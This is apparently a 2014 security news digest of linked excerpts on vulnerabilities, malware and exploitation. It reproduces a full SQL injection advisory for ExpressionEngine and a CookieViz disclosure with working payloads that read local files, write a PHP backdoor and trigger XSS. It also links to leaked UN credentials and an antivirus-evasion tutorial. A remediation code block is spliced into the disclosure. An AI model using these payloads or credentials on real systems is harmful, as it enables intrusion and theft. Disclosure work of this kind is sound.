Channel: BOT24

Paper: Exploiting CVE-2014-4113 on Windows 8.1

On the 14th of October 2014 both CrowdStrike [1] and FireEye [2] published a blog post describing a new zero-day privilege escalation vulnerability on Windows. The CrowdStrike article explains that this new vulnerability was identified in the process of tracking a supposedly highly advanced adversary group named HURRICANE PANDA and has been actively exploited in the wild for at least five months.

The vulnerability was apparently found and reported to Microsoft by both CrowdStrike and FireEye. It was subsequently fixed by Microsoft in MS14-058. Shortly after, the binaries described in the blog posts were found in the wild [3]. At the time of this writing there are several good analyses [4] of the exploit based on those binaries, as well as a working Metasploit module which supports all current 32-bit and 64-bit versions of Windows with the exception of Windows 8 and Windows 8.1.

more here............http://www.jodeit.org/research/Exploiting_CVE-2014-4113_on_Windows_8.1.pdf

Message Security Layer: A Modern Take on Securing Communication

Netflix serves audio and video to millions of devices and subscribers across the globe. Each device has its own unique hardware and software, and differing security properties and capabilities. The communication between these devices and our servers must be secured to protect both our subscribers and our service.
When we first launched the Netflix streaming service we used a combination of HTTPS and a homegrown security mechanism called NTBA to provide that security. However, over time this combination started exhibiting growing pains. With the advent of HTML5 and the Media Source Extensions and Encrypted Media Extensions we needed something new that would be compatible with that platform. We took this as an opportunity to address many of the shortcomings of the earlier technology. The Message Security Layer (MSL) was born from these dual concerns.

more here.......http://techblog.netflix.com/2014/10/message-security-layer-modern-take-on.html

PS Vita Level 1: Webkitties

A few weeks ago, a couple of friends and I decided to take a look at the PS Vita in order to see if we could exploit it in any way. Since I didn't really have an idea where to start, I did some research in order to get some information about the Vita.

more here...........http://acez.re/ps-vita-level-1-webkitties-3/

Paper: How Secure is TextSecure?

Instant messaging has attracted a lot of attention from users for both private and business communication and has especially gained popularity as a low-cost short message replacement on mobile devices. However, most popular mobile messaging apps do not provide end-to-end security. Press releases about mass surveillance performed by intelligence services such as the NSA and GCHQ have led many people to look for means that allow them to preserve the security and privacy of their communication on the Internet. Additionally fueled by Facebook's acquisition of the hugely popular messaging app WhatsApp, alternatives that claim to provide secure communication experienced a significant increase in new users.

A messaging app that has attracted a lot of attention lately is TextSecure, an app that claims to provide secure instant messaging and has a large number of installations via Google's Play Store. Its protocol is part of Android's most popular aftermarket firmware, CyanogenMod. In this paper, we present the first complete description of TextSecure's complex cryptographic protocol and are the first to provide a thorough security analysis of TextSecure. Among other findings, we present an Unknown Key-Share Attack on the protocol, along with a mitigation strategy, which has been acknowledged by TextSecure's developers. Furthermore, we formally prove that, if our mitigation is applied, TextSecure's push messaging can indeed achieve the goals of authenticity and confidentiality.

more here.........https://eprint.iacr.org/2014/904.pdf

Reversing D-Link’s WPS Pin Algorithm

While perusing the latest firmware for D-Link’s DIR-810L 802.11ac router, I found an interesting bit of code in sbin/ncc, a binary which provides back-end services used by many other processes on the device, including the HTTP and UPnP servers.

more here..........http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/

MS Bitlocker device encryption automatically uploads recovery keys to SkyDrive

A sends:

1) Bitlocker keys are uploaded to OneDrive by 'device encryption'.

"Unlike a standard BitLocker implementation, device encryption is enabled automatically so that the device is always protected.

...

If the device is not domain-joined a Microsoft Account that has been granted administrative privileges on the device is required. When the administrator uses a Microsoft account to sign in, the clear key is removed, a recovery key is uploaded to online Microsoft account and TPM protector is created."

more here...........http://cryptome.org/2014/11/ms-onedrive-nsa-prism.htm

Password hash disclosure in Linksys Smart WiFi routers

This is my tale about reporting a specific security vulnerability in a major product, just to give some insight in how responsible disclosures are handled by a security researcher (me) and various software companies (Cisco, Linksys and Belkin).

more here.........http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers

[BugBounty] The 5000$ Google XSS

Dear followers,
I recently searched for vulnerabilities on a Google service called Tag Manager; this service is used for SEO operations.

more here..........http://blog.it-securityguard.com/bugbounty-the-5000-google-xss/

Can We Rely on an Air-Gap to Secure our Critical Systems?

Following our recent disclosure on how to breach air-gap security with a simple mobile phone and RF emitted from the air-gapped computer, we wanted to provide an overview of the topic.

more here..........http://cyber.bgu.ac.il/blog/can-we-rely-air-gap-secure-our-critical-systems

Possible leaked credentials from United Nation Development Program

Possible leaked credentials from United Nation Development Program here....http://siph0n.in/exploits.php?id=3576

burpstaticscan

Use Burp's JS static code analysis on code from your local system. Here's generally how the process works:

A Go static file server is started to host the specified directory
The file server URL is added to Burp's scope
The directory is walked
For every file, a request is made to the file server
The raw request and response are sent to Burp's passive scanner through burpbuddy
Issues can then be seen in Burp

more here..........https://github.com/tomsteele/burpstaticscan

For Those Who Missed This News: Commission updates EU control list on dual use items

The Commission has updated the EU list of dual-use items – goods, software and technology normally used for civilian purposes but which might have military applications or contribute to the proliferation of weapons of mass destruction.

more here.........http://trade.ec.europa.eu/doclib/press/index.cfm?id=1166

Hacking Android phone using Metasploit

The world is shrinking with the growth of mobile phone technology. As the number of users increases day by day, facilities and statistics change likewise. Mobile phones provide ease and comfort in connecting to the people around us and enable us to share our conversations. But at the same time, security threats are also increasing with the growth in mobile users. With regard to security, users need to be aware of the attacks and of the security measures that need to be carried out. The most used mobile platform is Android, which is very popular compared with the other available platforms. Android has become the operating system of choice for users who value innovation, so in this article I am going to show how a mobile phone on the Android platform can be compromised using Metasploit.

more here...........http://infosecaffairs.blogspot.in/2014/11/hacking-android-phone-using-metasploit.html

Over 227,000 New Malware Samples Emerged Daily in Q3 2014

Cybercriminals have taken the fast lane to thieving and plundering, creating more than 20 million fresh strains of malware in the third quarter of the year, which translates into a rate of 227,747 new samples per day.

more here...........http://news.softpedia.com/news/Over-227-000-New-Malware-Ssamples-Emerged-Daily-In-Q3-2014-463771.shtml

CVE-2014-5387 - Multiple Authenticated SQL Injections in EllisLab ExpressionEngine Core

Vulnerability title: Multiple Authenticated SQL Injections in EllisLab ExpressionEngine Core
CVE: CVE-2014-5387
Vendor: EllisLab
Product: ExpressionEngine Core
Affected version: Versions earlier than 2.9.0
Fixed version: 2.9.1
Reported by: Jerzy Kramarz and Alex Murillo Moya

Details:

SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database.

The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:

Vulnerability 1

POST /ex/system/index.php?S=d80babaf271e481ba9a8fde69dd72b28&D=cp&C=addons_modules&M=show_module_cp&module=comment HTTP/1.1
Host: 192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: e5806ae56ad19f2124a4a22e517b00dfd47d2c32
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.56.103/ex/system/index.php?/cp/addons_modules/show_module_cp&module=comment&S=d80babaf271e481ba9a8fde69dd72b28
Content-Length: 243
Cookie: [...]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

tbl_sort%5B0%5D%5B%5D=comment_date<SQL Injection>&tbl_sort%5B0%5D%5B%5D=asc&csrf_token=e5806ae56ad19f2124a4a22e517b00dfd47d2c32&keywords=&XID=e5806ae56ad19f2124a4a22e517b00dfd47d2c32


Vulnerability 2

POST /ExpressEngine/system/index.php?S=5711f695056db582aa7427787f525d6f&D=cp&C=members&M=view_all_members HTTP/1.1
Host: 192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: e5806ae56ad19f2124a4a22e517b00dfd47d2c32
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [...]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

csrf_token=ee4[...]&member_name=1&column_filter=all<SQL Injection>&XID=ee4[...]


Vulnerability 3

POST /ExpressEngine/system/index.php?/cp/content_publish/entry_form&channel_id=2&entry_id=3&filter=YToxOntzOjEwOiJjaGFubmVsX2lkIjtzOjE6IjIiO30%3D&S=5711f695056db582aa7427787f525d6f HTTP/1.1
Host: 192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.103/ExpressEngine/system/index.php?/cp/content_publish/entry_form&channel_id=2&entry_id=3&filter=YToxOntzOjEwOiJjaGFubmVsX2lkIjtzOjE6IjIiO30=&S=5711f695056db582aa7427787f525d6f
Cookie: [...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------317032379522964
Content-Length: 4607

-----------------------------317032379522964
Content-Disposition: form-data; name="entry_id"

3
-----------------------------317032379522964
Content-Disposition: form-data; name="channel_id"

2
-----------------------------317032379522964
Content-Disposition: form-data; name="autosave_entry_id"

0
-----------------------------317032379522964
Content-Disposition: form-data; name="filter"

YToxOntzOjEwOiJjaGFubmVsX2lkIjtzOjE6IjIiO30=
-----------------------------317032379522964
Content-Disposition: form-data; name="csrf_token"

468a1cb7f860c43937e82527bb0c2dd0fea381e6
-----------------------------317032379522964
Content-Disposition: form-data; name="member_group[]"

1
-----------------------------317032379522964
Content-Disposition: form-data; name="layout_preview"

1
-----------------------------317032379522964
Content-Disposition: form-data; name="title"

About the Label
-----------------------------317032379522964
Content-Disposition: form-data; name="url_title"

about_the_label
-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_4"

text

-----------------------------317032379522964
Content-Disposition: form-data; name="field_ft_4"

xhtml
-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_5_hidden_file"

map2.jpg
-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_5_hidden_dir"

2
-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_5"; filename=""
Content-Type: application/octet-stream

-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_5_directory"

2
-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_6"

-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_7"

1
-----------------------------317032379522964
Content-Disposition: form-data; name="field_ft_7"

xhtml
-----------------------------317032379522964
Content-Disposition: form-data; name="entry_date"

8/13/14 2:02 PM
-----------------------------317032379522964
Content-Disposition: form-data; name="expiration_date"

-----------------------------317032379522964
Content-Disposition: form-data; name="comment_expiration_date"

-----------------------------317032379522964
Content-Disposition: form-data; name="category[]"

4<SQL Injection>
-----------------------------317032379522964
Content-Disposition: form-data; name="category[]"

3<SQL Injection>
-----------------------------317032379522964
Content-Disposition: form-data; name="new_channel"

2
-----------------------------317032379522964
Content-Disposition: form-data; name="status"

open
-----------------------------317032379522964
Content-Disposition: form-data; name="author"

1
-----------------------------317032379522964
Content-Disposition: form-data; name="sticky"

y
-----------------------------317032379522964
Content-Disposition: form-data; name="allow_comments"

y
-----------------------------317032379522964
Content-Disposition: form-data; name="pages__pages_uri"

/asd
-----------------------------317032379522964
Content-Disposition: form-data; name="pages__pages_template_id"

4
-----------------------------317032379522964
Content-Disposition: form-data; name="submit"

Submit
-----------------------------317032379522964--



Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5387/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.


Drupal 7.32 two weeks later - PoC

Automated attacks began compromising Drupal 7 websites that were not patched or updated to Drupal 7.32 within hours of the announcement of SA-CORE-2014-005 - Drupal core - SQL injection. You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement.
Drupal Security Team

With this in mind we release more information about the bug including a code execution PoC, which takes only one GET request with a cookie that will not be shown in any log.

more here..........https://www.sektioneins.de/en/blog/14-11-03-drupal-sql-injection-vulnerability-PoC.html

Report: A Flaw In Visa's Contactless Card Lets Anyone Charge It $999,999

Contactless credit cards are a hit in the UK. But a British research team has revealed a serious security flaw that allows anyone to charge up to $999,999.99 in foreign currency to a nearby card, even while it's still in a wallet or purse.

more here..........http://gizmodo.com/report-a-flaw-in-visas-contactless-card-lets-anyone-ch-1653974432

AntiVirus-evading Executable and Post-Exploitation with the Veil-Evasion Framework and Metasploit

In this post, I’m covering the creation of an executable carrying a shell_reverse_tcp payload that evades all antivirus software, and some post-exploitation steps using the Veil-Evasion Framework and Metasploit.

more here..........http://cultofthedyingsun.wordpress.com/2014/11/01/antivirus-evading-executable-and-post-exploitation-with-the-veil-evasion-framework-and-metasploit/

CNIL CookieViz XSS + SQL injection leading to user pwnage

# CNIL CookieViz XSS + SQL injection leading to user pwnage
#
# Product link:         https://github.com/LaboCNIL/CookieViz
# CVE references        CVE-2014-8351, CVE-2014-8352

TL;DR
-----
Since October 2014, the French National Commission on Informatics and Liberty "CNIL" has been performing controls on "tracking cookies" (ads, web audience measurement etc.) set by French websites:  http://www.cnil.fr/linstitution/actualite/article/article/cookies-des-controles-a-partir-doctobre/
In order for private individuals to know what cookies are set while browsing teh interwebz, CNIL "experts" generously released the "CookieViz" tool, which is compatible with most modern operating systems (Windows, Linux, OS X):
http://www.cnil.fr/vos-droits/vos-traces/les-cookies/telechargez-cookieviz/
https://github.com/LaboCNIL/CookieViz

Anyone can thus use this tool to check potential tracing infringements.
While this intention is definitely laudable, the produced code is dreadful and riddled with ridiculous security vulnerabilities: XSS, SQL injections and security misconfigurations which can lead to a data leakage of the user's files and potentially a compromise by pushing malicious files on his system.

For an organisation fighting for citizens' data privacy...exposing them to security troubles is the height of irony.


PoC
---
CookieViz is based on 2 components:
- A cookie harvester, which is basically a grep on tshark output with HTTP filters on;
- A cookie visualizer, which is a more or less fancy HTML GUI relying on d3js.

The 2 components are:
- Packaged in a standalone WAMP environment for Windows: both components are notably using the root MySQL account with all privileges (hello FILE), PHP magic quotes are off and so on...
- Unpackaged for Linux and Mac OS environments: you have to integrate them in your own (L|M)AMP. In this case, vuln impacts rely only on you and your setup.

The following PoC only focuses on Windows.
The scenario is:
0. You install the standalone package;
1. You visit a website in order to check its cookies. This website includes malicious resources, for instance in an iframe, which can:
   1.a) read arbitrary local files;
   1.b) write any content to non-existing files: you would directly execute arbitrary code on the victim's system, but interesting PHP functions like shell_exec(), exec(), passthru() etc. are explicitly disabled in the php.ini
2. You get pwned as the malicious resources are locally executed


SQLi injection: CVE-2014-8351
-----------------
On your malicious website, create an HTML file containing one of these payloads:

1.a)
<!DOCTYPE html>
<html>
<body>
<p>Reading arbitrary local file - C:\CookieViz\conf\php.ini :</p>
 <iframe src="http://localhost:81/cookie_viz/info.php?domain=*' union all select @@version,2,3,4,5,6,1,load_file('C:\\CookieViz\\conf\\php.ini'),9 -- /**">
 </iframe>
</body>
</html>


1.b) Inb4: '<?PHP echo "Im pwned " ?>' is converted to a string with the MySQL CHAR() function
<!DOCTYPE html>
<html>
<body>
<p>Inserting arbitrary PHP code in C:\CookieViz\www\backdoor.php :</p>
 <iframe src="http://localhost:81/cookie_viz/info.php?domain=*' union all select @@version,2,3,4,5,6,7,CHAR(39, 60, 63, 80, 72, 80, 32, 101, 99, 104, 111, 32, 34, 73, 109, 32, 112, 119, 110, 101, 100, 32, 34, 32, 63, 62, 39),9 INTO outfile 'C:\\CookieViz\\www\\backdoor.php' -- /**">
 </iframe>
</body>
</html>

2) Visit your HTML page with the standalone package browser.
3) Profit.


XSS: CVE-2014-8352
-----
http://localhost/cookieviz/json.php?max_date="><script>alert(1)</script>


Vuln details
-------
SQLi injections:
-----------------
info.php, line 21:

        if(isset($_GET["domain"]))
        {
                $domain = $_GET["domain"];
        }
        [...]
        $query="SELECT * FROM url_referer WHERE referer_domains='".$domain."'GROUP BY url_domains, referer_domains";
        $result = mysql_query($query) or die ("Echec de la requête : ".$query." ". mysql_error());
        while ($line = mysql_fetch_assoc($result))
        {
                echo "<tr>";
                if ($line["is_cookie"] == 1)
                {
                        echo "<td>".$line["referer_domains"];
                        echo "<td>".$line["url_domains"];
                        echo "<td>".$line["cookie"];
                }
                echo "</tr>";
        }


XSS:
-----
json.php, line 253:

        print '{"inf_nodes":'.$write_nodes.',"inf_links":'.$write_links.',"max_date":"'.$max_date.'","cpt":'.$cpt.'}';
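Hardened equivalents of the two snippets above, added here as an example and not taken from CNIL's code: the query binds the domain as a parameter instead of concatenating it, the table cells are escaped before being echoed, and the JSON document is built with json_encode rather than by string concatenation. The table and column names are the ones shown in the advisory; the database name, the low-privilege account, the environment variable holding its password and the node/link arrays passed to render_json are assumptions.

```php
<?php
// Hardened counterparts of info.php and json.php from the advisory above.
// Added example; not CookieViz code. Connection details are assumptions.
declare(strict_types=1);

function fetch_referers(mysqli $db, string $domain): array
{
    // Prepared statement: $domain travels as a bound parameter, never as
    // SQL text, so "*' union all select ..." is compared literally against
    // referer_domains and cannot reach load_file() or INTO OUTFILE.
    // The SELECT/GROUP BY shape is kept exactly as info.php has it.
    $stmt = $db->prepare(
        'SELECT * FROM url_referer WHERE referer_domains = ? '
        . 'GROUP BY url_domains, referer_domains'
    );
    $stmt->bind_param('s', $domain);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

function render_rows(array $rows): string
{
    // Every value here was sniffed from live HTTP traffic, so any site the
    // user visits controls it: escape before it lands in the HTML table.
    $html = '';
    foreach ($rows as $line) {
        $html .= '<tr>';
        if ((int) $line['is_cookie'] === 1) {
            foreach (['referer_domains', 'url_domains', 'cookie'] as $col) {
                $html .= '<td>'
                    . htmlspecialchars((string) $line[$col], ENT_QUOTES | ENT_HTML5, 'UTF-8')
                    . '</td>';
            }
        }
        $html .= '</tr>';
    }
    return $html;
}

function render_json(array $nodes, array $links, string $maxDate, int $cpt): string
{
    // json_encode quotes max_date itself, so "><script> from the query
    // string stays inside a JSON string instead of closing the document.
    // JSON_HEX_* additionally encodes <, >, & and quotes, which keeps the
    // body harmless even if a browser renders it as HTML.
    return json_encode([
        'inf_nodes' => $nodes,
        'inf_links' => $links,
        'max_date'  => $maxDate,
        'cpt'       => $cpt,
    ], JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Request handling for info.php: reject absurd input early, then bind.
$domain = $_GET['domain'] ?? '';
if ($domain === '' || strlen($domain) > 253) {
    http_response_code(400);
    exit('invalid domain');
}
// Assumed dedicated read-only account instead of the packaged root login:
// without the FILE privilege, load_file() and INTO OUTFILE are refused
// even if another injection slips through elsewhere in the code base.
$db = new mysqli('localhost', 'cookieviz_ro', getenv('COOKIEVIZ_DB_PASS') ?: '', 'cookieviz');
$db->set_charset('utf8mb4');
header('Content-Type: text/html; charset=UTF-8');
echo render_rows(fetch_referers($db, $domain));
```

For json.php the response should also be sent with header('Content-Type: application/json') so that a browser never interprets the body as markup in the first place.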

Solution
--------
- Slutshame CNIL
- Wait for patches


Timeline
--------
Oct 16, 2014: Getting to know that CNIL released a tool. Visiting the project page and laughing a bit
Oct 17, 2014: Requiring CVE, just for trolling purposes
Nov 03, 2014: Going fulldisclo, still for trolling purposes

ROM – A New Version of the Backoff PoS Malware

A few months have passed since the release of the “Backoff” point-of-sale (PoS) malware advisory, but Backoff and other PoS malware continue to be an active threat as businesses keep reporting data breaches and the compromise of their customers’ financial information.

We have recently encountered a new version of the Backoff malware family, which we are detecting as W32/Backoff.B!tr.spy. Unlike previous versions, this one no longer uses a version number in the malware body, but just uses the version name ROM. ROM performs very similarly to Backoff’s previous versions, but modifications have been made to make analysis more difficult and to avoid detection.

more here..........http://blog.fortinet.com/post/rom-a-new-version-of-the-backoff-pos-malware